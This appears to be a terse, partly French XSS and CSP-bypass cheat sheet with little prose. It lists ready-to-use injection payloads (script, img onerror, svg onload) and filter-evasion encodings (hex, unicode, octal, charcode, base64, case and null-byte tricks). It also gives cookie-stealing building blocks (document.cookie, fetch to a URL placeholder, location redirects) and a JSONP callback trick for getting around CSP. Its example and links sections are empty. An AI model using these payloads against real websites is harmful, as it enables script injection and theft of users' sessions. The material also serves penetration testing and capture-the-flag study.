XSS / CSP – Gadgets

Template

<script>alert(1)</script>
<img src=x onerror=alert(1) />
<svg onload=alert('XSS')>

Fonctions JS

btoa() //method encodes a string in base-64.
atob() //method to decode a base-64 encoded string.

document.getElementById(id)
document.getElementsByClassName(names)
document.getElementsByName(name) //for inputs

window.location.replace('<url>')
window.location.href='<url>'
document.cookie 
document['cookie']
fetch("<url>")

'hello'.concat('','world')
'hello'.slice(0,2)
`cookie : ${document.cookie}`

Contournement de filtre


<iMg>
<[%00]img>
\u0061lert(1)
alert`1`

"hack"
'hack'
`hack`
"\h\a\c\k\"                              // some chars are not working
"\x68\x61\x63\x6b"                       // hex
"\u0068\u0061\u0063\u006b"               // unicode
"\150\141\143\153"                       // charcode base 8
/hack/
/hack/.source
String.fromCharCode(104,97,99,107)       // charcode base 10
atob("aGFjaw==")

<script      ///Note the newline
>alert(1)</script>

Exemple


JSONP

http://lun.org/page?p=<script>src="https://content-customsearch.googleapis.com/customsearch/v1?q=hello&callback=<javascript>"></script>

Liens utiles

Sources :